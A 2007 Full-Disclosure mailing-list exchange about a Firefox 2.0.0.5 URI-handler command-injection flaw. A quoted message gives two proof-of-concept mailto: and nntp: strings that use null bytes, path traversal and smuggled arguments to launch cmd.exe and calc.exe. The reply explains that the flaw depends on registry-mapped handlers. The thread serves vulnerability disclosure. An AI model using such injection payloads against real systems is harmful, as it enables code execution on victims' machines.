Check out our blog on xs-sniper.com. There's more info there. This flaw does somewhat depend upon what you have installed, as is referenced on our blog page. Keep in mind that the URI's are tied to commands thru the registry, and that those commands are where the command injections go. If you have a different command from what we have, then of course there's the chance it doesn't work.
Thanks, Nate On 7/25/07, Mesut EREN <[EMAIL PROTECTED]> wrote: > > > > Hi all, > > FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But > don't work is code. > > Example code is > > mailto:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > nntp:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > Where i missing? > > > > Mesut EREN > BAŞAK ÇATI & CEPHE SİSTEMLERİ > Bilgi İşlem Sorumlusu > > MCSA:S,MCSE:S,CEH,CCNA > > [EMAIL PROTECTED] > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
